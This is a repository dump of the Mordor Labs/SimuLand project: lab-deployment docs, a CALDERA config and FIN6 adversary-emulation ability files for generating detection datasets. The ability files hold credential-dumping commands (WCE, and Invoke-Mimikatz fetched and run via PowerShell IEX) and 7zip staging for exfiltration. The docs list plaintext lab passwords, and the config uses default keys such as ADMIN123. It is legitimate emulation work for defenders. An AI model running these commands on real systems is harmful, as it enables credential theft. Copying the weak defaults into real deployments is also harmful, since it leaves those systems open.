 43 |    
 44 |   <div class="wy-grid-for-nav">
 45 |     
 46 |     <nav data-toggle="wy-nav-shift" class="wy-nav-side">
 47 |       <div class="wy-side-scroll">
 48 |         <div class="wy-side-nav-search" >
 49 |           
 50 | 
 51 |           
 52 |             <a href="index.html" class="icon icon-home"> Mordor Labs
 53 |           
 54 | 
 55 |           
 56 |           </a>
 57 | 
 58 |           
 59 |             
 60 |             
 61 |           
 62 | 
 63 |           
 64 | <div role="search">
 65 |   <form id="rtd-search-form" class="wy-form" action="#" method="get">
 66 |     <input type="text" name="q" placeholder="Search docs" />
 67 |     <input type="hidden" name="check_keywords" value="yes" />
 68 |     <input type="hidden" name="area" value="default" />
 69 |   </form>
 70 | </div>
 71 | 
 72 |           
 73 |         </div>
 74 | 
 75 |         <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation">
 76 |           
 77 |             
 78 |             
 79 |               
 80 |             
 81 |             
 82 |               <p class="caption"><span class="caption-text">Environments:</span></p>
 83 | <ul>
 84 | <li class="toctree-l1"><a class="reference internal" href="environments/attack_evals.html">ATT&amp;CK Evals</a></li>
 85 | <li class="toctree-l1"><a class="reference internal" href="environments/windows.html">Windows</a></li>
 86 | </ul>
 87 | 
 88 |             
 89 |           
 90 |         </div>
 91 |       </div>
 92 |     </nav>
 93 | 
 94 |     <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">
 95 | 
 96 |       
 97 |       <nav class="wy-nav-top" aria-label="top navigation">
 98 |         
 99 |           <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
100 |           <a href="index.html">Mordor Labs</a>
101 |         
102 |       </nav>
103 | 
104 | 
105 |       <div class="wy-nav-content">
106 |         
107 |         <div class="rst-content">
108 |         
109 |           
110 | 
111 | 
112 | 
113 | 
114 | 
115 | 
116 | 
117 | 
118 | 
119 | 
120 | 
121 | 
122 | 
123 | 
124 | 
125 | <div role="navigation" aria-label="breadcrumbs navigation">
126 | 
127 |   <ul class="wy-breadcrumbs">
128 |     
129 |       <li><a href="index.html">Docs</a> &raquo;</li>
130 |         
131 |       <li>Search</li>
132 |     
133 |     
134 |       <li class="wy-breadcrumbs-aside">
135 |         
136 |             
137 |         
138 |       </li>
139 |     
140 |   </ul>
141 | 
142 |   
143 |   <hr/>
144 | </div>
145 |           <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article">
146 |            <div itemprop="articleBody">
147 |             
148 |   <noscript>
149 |   <div id="fallback" class="admonition warning">
150 |     <p class="last">
151 |       Please activate JavaScript to enable the search
152 |       functionality.
153 |     </p>
154 |   </div>
155 |   </noscript>
156 | 
157 |   
158 |   <div id="search-results">
159 |   
160 |   </div>
161 | 
162 |            </div>
163 |            
164 |           </div>
165 |           <footer>
166 |   
167 | 
168 |   <hr/>
169 | 
170 |   <div role="contentinfo">
171 |     <p>
172 |         &copy; Copyright 2020, Roberto Rodriguez @Cyb3rWard0g
173 | 
174 |     </p>
175 |   </div>
176 |   Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/rtfd/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. 
177 | 
178 | </footer>
179 | 
180 |         </div>
181 |       </div>
182 | 
183 |     </section>
184 | 
185 |   </div>
186 |   
187 | 
188 | 
189 |   <script type="text/javascript">
190 |       jQuery(function () {
191 |           SphinxRtdTheme.Navigation.enable(true);
192 |       });
193 |   </script>
194 | 
195 |   
196 |   
197 |     
198 |   
199 |   <script type="text/javascript">
200 |     jQuery(function() { Search.loadIndex("searchindex.js"); });
201 |   </script>
202 |   
203 |   <script type="text/javascript" id="searchindexloader"></script>
204 |    
205 | 
206 | 
207 | </body>
208 | </html>


--------------------------------------------------------------------------------
/docs/build/html/searchindex.js:
--------------------------------------------------------------------------------
1 | Search.setIndex({docnames:["environments/attack_evals","environments/evals/apt29","environments/windows","environments/windows/shire","index"],envversion:{"sphinx.domains.c":1,"sphinx.domains.changeset":1,"sphinx.domains.citation":1,"sphinx.domains.cpp":1,"sphinx.domains.index":1,"sphinx.domains.javascript":1,"sphinx.domains.math":2,"sphinx.domains.python":1,"sphinx.domains.rst":1,"sphinx.domains.std":1,sphinx:56},filenames:["environments/attack_evals.rst","environments/evals/apt29.md","environments/windows.rst","environments/windows/shire.md","index.rst"],objects:{},objnames:{},objtypes:{},terms:{"1c6c4bc32c9a":1,"public":[1,3],"while":[1,3],And:[1,3],P2S:[0,2],The:1,Use:[1,3],VMs:[1,3],abc123:[1,3],access:[1,3],account:[1,3],address:[1,3],admin:[1,3],adminpassword:[1,3],adminusernam:[1,3],adversari:[0,3],after:1,again:[1,3],agent:[1,3],apt29:[0,4],apt:[1,3],arm:1,assist:[1,3],att:[1,4],attack:1,audit:[1,3],azur:[1,3],azuredeploi:[1,3],b1gm:[1,3],b33t:[1,3],base64:[1,3],bash:[1,3],beaver:[1,3],beesli:[1,3],befor:[1,3],being:[1,3],bestboss:[1,3],blog:0,brew:[1,3],buggi:[1,3],built:1,cacert:[1,3],can:[1,3],cert:[1,3],chang:[1,3],cio:[1,3],cli:[1,3],client:[1,3],clientrootcertdata:[1,3],clientrootcertnam:[1,3],clone:[1,3],cloud:4,collect:[0,2],com:[1,3],come:[1,3],command:[1,3],commun:1,config:[1,3],configur:[1,3],connect:[0,2],consum:[1,3],content:4,could:[1,3],creat:[1,3,4],data:[0,2],dataset:4,date:[1,3],debian:[1,3],defin:[1,3],delet:[1,3],depart:[1,3],deploi:4,deploy:[0,2],der:[1,3],design:[0,2],detect:1,develop:1,director:[1,3],directori:[1,3],doe:[1,3],domain:[0,2],domainus:[1,3],dschrute:[1,3],dwight:[1,3],earlier:[1,3],east:[0,2],eastu:[1,3],emul:[0,3],end:[1,3],endpoint:[1,3],enough:[1,3],environ:[0,4],eval:[1,4],event:[0,2],eventhub:[1,3],eventhunb:[1,3],everi:[1,3],exclus:4,execut:[1,3],extens:[1,3],firstnam:[1,3],fl0nk3rt0n:[1,3],follow:[1,3],forg:1,format:[1,3],forward:[1,3],free:1,from:[1,3],gener:4,get:[1,3],github:[1,3],goal:1,group:[1,3],gustavo:[1,3],have:[1,3],homebrew:[1,3],http:[1,3],hub:[1,3],human:[1,3],hunter:1,ident:[1,3],inform:[0,2],infosec:1,jobtitl:[1,3],json:[1,3],kei:[1,3],lab:[1,3],lastnam:[1,3],linux:[1,3],local:[1,3],locat:[1,3],log:[0,2],logstash:[1,3],lrodriguez:[1,3],lucho:[1,3],mac:[1,3],main:1,make:[1,3],manag:[1,3],martha:[1,3],master:[1,3],medium:1,methodolog:1,michael:[1,3],moment:[1,3],mordor:[1,3],mordor_:[1,3],mscott:[1,3],myresourcegroup:[1,3],name:[1,3],namespac:[1,3],need:[1,3],net:[1,3],network:[0,2,4],nmartha:[1,3],norah:[1,3],offici:1,onc:[1,3],one:[1,3],onli:4,openssl:[1,3],openvpn:[1,3],opportun:[1,4],option:[1,3],otrf:[1,3],outform:[1,3],over:[1,3],pam:[1,3],paramet:[1,3],part:1,pass:[1,3],password:[1,3],pbcopi:[1,3],pbeesli:[1,3],pcap:[0,2],pedro:[1,3],pem:[1,3],pgustavo:[1,3],pipelin:[1,3],plan:[1,3],post:0,powershel:1,privat:[1,3],produc:1,project:[1,3,4],rdp:[1,3],readi:[1,3],real:[1,3],recent:[1,3],recept:[1,3],receptionist:[1,3],replic:1,research:[1,4],resourc:[1,3],right:[1,3],rms:[1,3],rodriguez:[1,3],root:[1,3],rule:[1,3],run:[1,3],sacl:[1,3],sale:[1,3],samaccountnam:[1,3],save:[1,3],sbeaver:[1,3],scenario:1,schrut3f:[1,3],schrute:[1,3],scott:[1,3],script:[1,4],secur:[0,2],send:[1,3],sent:[1,3],servic:[1,3],servicebu:[1,3],session:[1,3],set:[1,3],sever:1,share:1,shire:[2,4],sign:[1,3],similar:1,sourc:[0,2],ssh:[1,3],stevi:[1,3],storag:[1,3],subscript:[1,3],support:[1,3],sure:[1,3],sysmon:[1,3],sysmonsvc:[1,3],system:[1,3],t0by:[1,3],t0d:[1,3],t3m1k3:[1,3],team:1,techniqu:[1,3],telemetri:1,templat:[1,3,4],them:[1,3],thi:[1,3,4],threat:1,time:[1,3],tool:[1,3],tree:[1,3],updat:[1,3],use:[1,3],used:[1,4],user:[0,2],usercontain:[1,3],usernam:[1,3],using:1,valu:[1,3],via:[1,3],video:1,vpn:[0,2],w1n1:[1,3],want:[1,3],watcher:[1,3],wef:[1,3],west:[0,2],which:[1,3],window:[1,3,4],workstation1:[1,3],workstation2:[1,3],would:[1,3],write:[1,3],x509:[1,3],you:[1,3],your:[1,3]},titles:["ATT&amp;CK Evaluations","APT29 Evaluations","Windows Environments","Shire Environment","Welcome to Mordor Labs"],titleterms:{P2S:[1,3],adversari:1,apt29:1,att:0,blog:1,captur:[1,3],certif:[1,3],collect:[1,3],conf:[1,3],connect:[1,3],data:[1,3],deploi:[1,3],deploy:[1,3],design:[1,3],domain:[1,3],east:[1,3],emul:1,environ:[1,2,3],evalu:[0,1],event:[1,3],file:[1,3],inform:[1,3],instal:[1,3],kafkacat:[1,3],lab:4,liabil:4,log:[1,3],mordor:4,network:[1,3],packet:[1,3],pcap:[1,3],point:[1,3],post:1,respons:4,secur:[1,3],setup:[1,3],shire:3,site:[1,3],sourc:[1,3],start:[1,3],stop:[1,3],usag:4,user:[1,3],vpn:[1,3],welcom:4,west:[1,3],window:2}})


--------------------------------------------------------------------------------
/docs/make.bat:
--------------------------------------------------------------------------------
 1 | @ECHO OFF
 2 | 
 3 | pushd %~dp0
 4 | 
 5 | REM Command file for Sphinx documentation
 6 | 
 7 | if "%SPHINXBUILD%" == "" (
 8 | 	set SPHINXBUILD=sphinx-build
 9 | )
10 | set SOURCEDIR=source
11 | set BUILDDIR=build
12 | 
13 | if "%1" == "" goto help
14 | 
15 | %SPHINXBUILD% >NUL 2>NUL
16 | if errorlevel 9009 (
17 | 	echo.
18 | 	echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
19 | 	echo.installed, then set the SPHINXBUILD environment variable to point
20 | 	echo.to the full path of the 'sphinx-build' executable. Alternatively you
21 | 	echo.may add the Sphinx directory to PATH.
22 | 	echo.
23 | 	echo.If you don't have Sphinx installed, grab it from
24 | 	echo.http://sphinx-doc.org/
25 | 	exit /b 1
26 | )
27 | 
28 | %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
29 | goto end
30 | 
31 | :help
32 | %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
33 | 
34 | :end
35 | popd
36 | 


--------------------------------------------------------------------------------
/docs/requirements.txt:
--------------------------------------------------------------------------------
1 | sphinx-markdown-tables


--------------------------------------------------------------------------------
/docs/source/_static/mordor-apt29-design.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/source/_static/mordor-apt29-design.png


--------------------------------------------------------------------------------
/docs/source/_static/mordor-shire-design.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/docs/source/_static/mordor-shire-design.png


--------------------------------------------------------------------------------
/docs/source/conf.py:
--------------------------------------------------------------------------------
 1 | # Configuration file for the Sphinx documentation builder.
 2 | #
 3 | # This file only contains a selection of the most common options. For a full
 4 | # list see the documentation:
 5 | # https://www.sphinx-doc.org/en/master/usage/configuration.html
 6 | 
 7 | # -- Path setup --------------------------------------------------------------
 8 | 
 9 | # If extensions (or modules to document with autodoc) are in another directory,
10 | # add these directories to sys.path here. If the directory is relative to the
11 | # documentation root, use os.path.abspath to make it absolute, like shown here.
12 | #
13 | # import os
14 | # import sys
15 | # sys.path.insert(0, os.path.abspath('.'))
16 | 
17 | 
18 | # -- Project information -----------------------------------------------------
19 | 
20 | project = 'Mordor Labs'
21 | copyright = '2020, Roberto Rodriguez @Cyb3rWard0g'
22 | author = 'Roberto Rodriguez @Cyb3rWard0g'
23 | 
24 | # The full version, including alpha/beta/rc tags
25 | release = '0.1'
26 | 
27 | 
28 | # -- General configuration ---------------------------------------------------
29 | 
30 | # Add any Sphinx extension module names here, as strings. They can be
31 | # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
32 | # ones.
33 | extensions = [
34 |     'recommonmark',
35 |     'sphinx_markdown_tables'
36 | ]
37 | 
38 | # Add any paths that contain templates here, relative to this directory.
39 | templates_path = ['_templates']
40 | 
41 | # List of patterns, relative to source directory, that match files and
42 | # directories to ignore when looking for source files.
43 | # This pattern also affects html_static_path and html_extra_path.
44 | exclude_patterns = []
45 | 
46 | 
47 | # -- Options for HTML output -------------------------------------------------
48 | 
49 | # The theme to use for HTML and HTML Help pages.  See the documentation for
50 | # a list of builtin themes.
51 | #
52 | html_theme = 'sphinx_rtd_theme'
53 | 
54 | # Add any paths that contain custom static files (such as style sheets) here,
55 | # relative to this directory. They are copied after the builtin static files,
56 | # so a file named "default.css" will overwrite the builtin "default.css".
57 | html_static_path = ['_static']
58 | 
59 | # The master toctree document.
60 | master_doc = 'index'


--------------------------------------------------------------------------------
/docs/source/environments/attack_evals.rst:
--------------------------------------------------------------------------------
1 | ATT&CK Evaluations
2 | ==================
3 | 
4 | .. toctree::
5 |    :maxdepth: 2
6 | 
7 |    APT29 <evals/apt29>


--------------------------------------------------------------------------------
/docs/source/environments/windows.rst:
--------------------------------------------------------------------------------
1 | Windows Environments
2 | ====================
3 | 
4 | .. toctree::
5 |    :maxdepth: 2
6 | 
7 |    Shire <windows/shire>


--------------------------------------------------------------------------------
/docs/source/environments/windows/shire.md:
--------------------------------------------------------------------------------
  1 | # Shire Environment
  2 | 
  3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FSimuLand%2Fmaster%2Fenvironments%2Fwindows%2Fshire%2Fazuredeploy.json) [![Visualize](https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/1-CONTRIBUTION-GUIDE/images/visualizebutton.png)](http://armviz.io/#/?load=https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FSimuLand%2Fmaster%2Fenvironments%2Fwindows%2Fshire%2Fazuredeploy.json)
  4 | 
  5 | ## Network Design
  6 | 
  7 | ![](../../_static/mordor-shire-design.png)
  8 | 
  9 | ## Domain Users Information
 10 | 
 11 | | FirstName | LastName | SamAccountName | Department | JobTitle | Password | Identity | UserContainer | 
 12 | |:--- |:--- |:--- |:--- |:--- |:--- |:--- |:--- |
 13 | | Norah | Martha | nmartha | Human Resources | HR Director | S@l@m3!123 | Users | DomainUsers | 
 14 | | Pedro | Gustavo | pgustavo | IT Support | CIO | W1n1!2019 | Domain Admins | DomainUsers |
 15 | | Lucho | Rodriguez | lrodriguez | Accounting | VP | T0d@y!2019 | Users | DomainUsers |
 16 | | Stevie | Beavers | sbeavers | Sales | Agent | B1gM@c!2020 | Users | DomainUsers |
 17 | | Pam | Beesly | pbeesly | Reception | Receptionist | Fl0nk3rt0n!T0by | Users | DomainUsers |
 18 | | Dwight | Schrute | dschrute | Sales | Assistant | Schrut3F@rms!B33ts | Users | DomainUsers |
 19 | | Michael | Scott | mscott | Management | BestBoss | abc123!D@t3M1k3 | Domain Admins | DomainUsers | 
 20 | | Sysmon | MS | sysmonsvc | IT Support | Service Account | Buggy!1122 | Users | DomainUsers |
 21 | 
 22 | ## Data Sources Collected
 23 | 
 24 | * [Windows Security Auditing](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Enable-WinAuditCategories.ps1)
 25 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmonv11.0.xml)
 26 | * [WEF Subscriptions](https://github.com/OTRF/Blacksmith/tree/master/resources/configs/wef/subscriptions)
 27 | * [SACL Audit Rules](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Set-SACLs.ps1)
 28 | 
 29 | ## Deployment
 30 | 
 31 | #### Point-To-Site VPN Certificates Setup
 32 | 
 33 | * [Create root CA certificate](https://blacksmith.readthedocs.io/en/latest/azure_p2s_vpn_setup.html#create-a-root-ca-certificate)
 34 | * Get the name of it (CN= Root CA Name)
 35 | * Get the root CA cert data by running the following commands and save it to pass it as a parameter while creating the environment.
 36 | 
 37 | ```
 38 | openssl x509 -in caCert.pem -outform der | base64 | pbcopy
 39 | ```
 40 | * [Create a client Certificate signed with the CA’s root key](https://blacksmith.readthedocs.io/en/latest/azure_p2s_vpn_setup.html#create-a-client-certificate-signed-with-the-ca-s-root-key)
 41 | 
 42 | ### Deploy Environment
 43 | 
 44 | * Clone the project and change your directory to windows one
 45 | 
 46 | ```
 47 | https://github.com/OTRF/SimuLand
 48 | cd SimuLand/tree/master/environments/windows/shire
 49 | ```
 50 | 
 51 | * [Install and set up Azure CLI](https://blacksmith.readthedocs.io/en/latest/azure_cli_setup.html)
 52 | * Create an Azure Resource group
 53 | 
 54 | ```
 55 | az group create --location eastus --resource-group MyResourceGroup
 56 | ```
 57 | 
 58 | * Use the following commands to create the environment
 59 | 
 60 | ```
 61 | az group deployment create --name <Deployment Name> --resource-group <Resource Group Name> --template-file azuredeploy.json --parameters adminUsername=<USERNAME> adminPassword='<PASSWORD>' clientRootCertName=<Root CA Certificate Name> clientRootCertData="<Root CA Cert Data>"
 62 | ```
 63 | 
 64 | ## Connect to Environment (P2S VPN)
 65 | 
 66 | VMs deployed in Azure will not be accessible via their Public IP addresses. A Point-To-Site (P2S) VPN is set up and you will need to use a client certificate signed with the CA's root private key created earlier. 
 67 | 
 68 | * [Set up OpenVPN Client](https://docs.microsoft.com/en-us/azure/vpn-gateway/vpn-gateway-howto-openvpn-clients)
 69 |     * Use the Client's Certificate (PEM format)
 70 |     * Use the Client's Private Key (PEM format)
 71 | * RDP or SSH to the Windows and Linux endpoints in the environment.
 72 | 
 73 | ## Collect Security Event Logs
 74 | 
 75 | This environment comes with a data pipeline option to collect security event logs from Windows Endpoints via Windows Event Forwarding (WEF) configurations, send them to a Logstash pipeline which sends them over to an Azure Event Hub. From there, one could use tools such as Kafkacat to connect to the Azure Event hub, consume events being sent over and write them to a local JSON file in real-time.
 76 | 
 77 | ### Install Kafkacat
 78 | 
 79 | On recent enough Debian systems:
 80 | 
 81 | ```
 82 | apt-get install kafkacat
 83 | ```
 84 | 
 85 | And on Mac OS X with homebrew installed:
 86 | 
 87 | ```
 88 | brew install kafkacat
 89 | ```
 90 | 
 91 | ### Kafkacat Conf File Setup
 92 | 
 93 | Make sure you update the [**Kafkacat.conf**](https://github.com/OTRF/SimuLand/blob/master/environments/windows/kafkacat/kafkacat.conf) with the values from your environment.
 94 | 
 95 | **Run Kafkacat and Consume Events**
 96 | 
 97 | Once you create the environment, you can run the following command to start consuming events from the Azure Event Hub and write them to a local JSON file:
 98 | 
 99 | ```
100 | kafkacat -b <eventhub-namespace>.servicebus.windows.net:9093 -t <eventhunb-name> -F kafkacat.conf -C -o end > mordor_$(date +%F%H%M%S).json
101 | ```
102 | 
103 | I would run that command right before emulating adversary techniques.
104 | 
105 | ## Collect PCAP (East-West)
106 | 
107 | This environment is set up to start a [packet capture](https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-packet-capture-overview) via the [Azure Network Watcher extension](https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/network-watcher-windows) installed on every Windows VM. Every PCAP is sent to an Azure storage account defined at the moment you start the pcap session. I would do it once you are ready to start the execution of the emulation plan.
108 | 
109 | ### Start Packet Capture
110 | 
111 | ```
112 | bash Start-Packet-Capture.sh -r <Resource Group name> -s <Storage Account name> -c WORKSTATION1,WORKSTATION2
113 | ```
114 | 
115 | ### Stop Packet Capture
116 | 
117 | You can stop the packet capture sessions by running the following command. This does not delete the packet capture session. You will have to delete it if you want to start it again.
118 | 
119 | ```
120 | bash Stop-Packet-Capture.sh -r <Resource Group name> -c WORKSTATION1,WORKSTATION2 -l eastus
121 | ```
122 | 
123 | You can stop and delete the packet captures with the following command:
124 | 
125 | ```
126 | bash Stop-Packet-Capture.sh -r <Resource Group name> -c WORKSTATION1,WORKSTATION2 -l eastus -d
127 | ```
128 | 


--------------------------------------------------------------------------------
/docs/source/index.rst:
--------------------------------------------------------------------------------
 1 | .. Mordor Labs documentation master file, created by
 2 |    sphinx-quickstart on Wed Jun 10 12:05:49 2020.
 3 |    You can adapt this file completely to your liking, but it should at least
 4 |    contain the root `toctree` directive.
 5 | 
 6 | Welcome to Mordor Labs
 7 | ======================
 8 | 
 9 | Cloud Templates and scripts to deploy network environments **exclusively** to generate datasets for the `Mordor project <https://mordordatasets.com>`_.
10 | 
11 | Liability / Responsible Usage
12 | #############################
13 | 
14 | This content is **ONLY** to be used to create research opportunities and generate datasets for the `Mordor project <https://mordordatasets.com>`_.
15 | 
16 | .. toctree::
17 |    :maxdepth: 2
18 |    :caption: Environments:
19 | 
20 |    ATT&CK Evals <environments/attack_evals>
21 |    Windows <environments/windows>
22 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/SimuLand/18200e75af4b15914d478f0094c86e5e94fd9878/environments/adversary-emulation-library/fin6/README.md


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/Dockerfile:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | # Referneces:
 5 | # https://github.com/mitre-attack/attack-arsenal/tree/master/adversary_emulation/APT29
 6 | 
 7 | FROM cyb3rward0g/docker-caldera:2.8.0-201004
 8 | LABEL maintainer="Roberto Rodriguez @Cyb3rWard0g"
 9 | LABEL description="Dockerfile FIN6 emulation plan"
10 | 
11 | USER ${USER}
12 | 
13 | COPY plugin $CALDERA_HOME/plugins/ctid_fin6
14 | COPY conf/local.yml ${CALDERA_HOME}/conf/local.yml


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/conf/local.yml:
--------------------------------------------------------------------------------
 1 | ability_refresh: 60
 2 | api_key_blue: BLUEADMIN123
 3 | api_key_red: ADMIN123
 4 | app.contact.gist: API_KEY
 5 | app.contact.html: /weather
 6 | app.contact.http: http://0.0.0.0:8888
 7 | app.contact.tcp: 0.0.0.0:7010
 8 | app.contact.udp: 0.0.0.0:7011
 9 | app.contact.websocket: 0.0.0.0:7012
10 | crypt_salt: REPLACE_WITH_RANDOM_VALUE
11 | encryption_key: ADMIN123
12 | exfil_dir: /tmp
13 | host: 0.0.0.0
14 | crypt_salt: REPLACE_WITH_RANDOM_VALUE
15 | exfil_dir: /tmp
16 | plugins:
17 |   - sandcat
18 |   - stockpile
19 |   - compass
20 |   - manx
21 |   - response
22 |   - gameboard
23 |   - training
24 |   - access
25 |   - atomic
26 |   - fieldmanual
27 |   - ctid_fin6
28 | port: 8888
29 | reports_dir: /tmp
30 | requirements:
31 |   go:
32 |     command: go version
33 |     type: installed_program
34 |     version: 1.11
35 |   python:
36 |     attr: version
37 |     module: sys
38 |     type: python_module
39 |     version: 3.6.1
40 | users:
41 |   blue:
42 |     blue: admin
43 |   red:
44 |     admin: admin
45 |     red: admin


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/collection/fd27fe6c-4846-4e94-aef9-f6bc21ab0f0e.yml:
--------------------------------------------------------------------------------
 1 | - id: fd27fe6c-4846-4e94-aef9-f6bc21ab0f0e
 2 |   name: Compress Files with 7zip (7.exe)
 3 |   description: Compress text files for exfiltration staging using 7zip, renamed to 7.exe
 4 |   tactic: collection
 5 |   technique:
 6 |     attack_id: T1560.001
 7 |     name: 'Archive Collected Data: Archive via Utility'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
 9 |   procedure_group: procedure_collection
10 |   procedure_step: '4.1'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           '7.exe a -mx3 ad.7z ad_*'
16 |         payloads:
17 |         - 7.exe
18 |   input_arguments:
19 |     7_exe:
20 |       description: Path of 7.exe
21 |       type: Path
22 |       default: C:\ProgramData\7.exe
23 |     7_url:
24 |       description: Path to download 7zip file
25 |       type: URL
26 |       default: https://7-zip.org/a/7z1900-x64.exe
27 |     7_hash:
28 |       description: File hash of the 7 zip file
29 |       type: String
30 |       default: 0F5D4DBBE5E55B7AA31B91E5925ED901FDF46A367491D81381846F05AD54C45E
31 |   dependency_executor_name: powershell
32 |   dependencies:
33 |   - description: 7.exe must exist on disk at specified location (#{7_exe})
34 |     prereq_command: if (Test-Path \#{7_exe}) {exit 0} else {exit 1}
35 |     get_prereq_command: |
36 |       $parentpath = Split-Path "#{7_exe}"; $zippath = "$parentpath\7.zip"
37 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
38 |       if(Invoke-WebRequestVerifyHash "#{7_url}" "$zippath" \#{7_hash}) {
39 |       Expand-Archive $zippath $parentpath\7 -Force
40 |       Move-Item $parentpath\7\7.exe "#{7_exe}"
41 |       Remove-Item $zippath, $parentpath\7 -Recurse
42 |       }
43 |   executors:
44 |   - name: command_prompt
45 |     command: 7.exe a -mx3 ad.7z ad_*
46 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/credential-access/97412b40-4940-4da1-8bff-6f11d42bca26.yml:
--------------------------------------------------------------------------------
 1 | - id: 97412b40-4940-4da1-8bff-6f11d42bca26
 2 |   name: WCE Credential Access
 3 |   description: FIN6 is reported to have used WCE to access credentials on at least one occasion.
 4 |   tactic: credential-access
 5 |   technique:
 6 |     attack_id: T1003.001
 7 |     name: 'OS Credential Dumping: LSASS Memory - Windows Credential Editor (WCE)'
 8 |   cti_source: https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf
 9 |   procedure_group: procedure_cred_access
10 |   procedure_step: '3.4'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           wce.exe -w -o wce_creds.txt
16 |         payloads:
17 |         - wce.exe
18 |         cleanup: 'del "#{output_file}" >nul 2>&1'
19 |   input_arguments:
20 |     output_file:
21 |       description: Path where resulting data should be placed
22 |       type: Path
23 |       default: '%temp%\wce-output.txt'
24 |     wce_exe:
25 |       description: Path of Windows Credential Editor
26 |       type: Path
27 |       default: C:\ProgramData\wce.exe
28 |     wce_url:
29 |       description: Path to download Windows Credential Editor zip file
30 |       type: URL
31 |       default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
32 |     wce_zip_hash:
33 |       description: File hash of the Windows Credential Editor zip file
34 |       type: string
35 |       default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933
36 |   dependency_executor_name: powershell
37 |   dependencies:
38 |   - description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
39 |     prereq_command: if (Test-Path \#{wce_exe}) {exit 0} else {exit 1}
40 |     get_prereq_command: |
41 |       $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
42 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
43 |       if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}) {
44 |       Expand-Archive $zippath $parentpath\wce -Force
45 |       Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
46 |       Remove-Item $zippath, $parentpath\wce -Recurse
47 |       }
48 |   executors:
49 |   - name: command_prompt
50 |     elevation_required: true
51 |     command: '#{wce_exe} -o #{output_file}'
52 |     cleanup_command: del "#{output_file}" >nul 2>&1
53 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/credential-access/ff77db3d-ded1-48da-9885-8dfc097edec0.yml:
--------------------------------------------------------------------------------
 1 | - id: ff77db3d-ded1-48da-9885-8dfc097edec0
 2 |   name: PowerSploit Invoke-Mimikatz
 3 |   description: Dump credentials from memory via PowerShell by invoking a remote Mimikatz script, similar to the procedure used by FIN6.
 4 |   tactic: credential-access
 5 |   technique:
 6 |     attack_id: T1003.001
 7 |     name: 'OS Credential Dumping: LSASS Memory - Invoke-Mimikatz'
 8 |   cti_source: https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/
 9 |   procedure_group: procedure_privesc
10 |   procedure_step: '3.2'
11 |   platforms:
12 |     windows:
13 |       psh:
14 |         command: |
15 |           powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/discovery/02a96c18-f700-482d-88a8-bd311f6c41dc.yml:
--------------------------------------------------------------------------------
 1 | - id: 02a96c18-f700-482d-88a8-bd311f6c41dc
 2 |   name: Enumerate AD trust objects
 3 |   description: Performs a full forest search and dumps trust objects to a text file.
 4 |   tactic: discovery
 5 |   technique:
 6 |     attack_id: T1482
 7 |     name: Domain Trust Discovery
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
 9 |   procedure_group: procedure_discovery
10 |   procedure_step: '2.4'
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
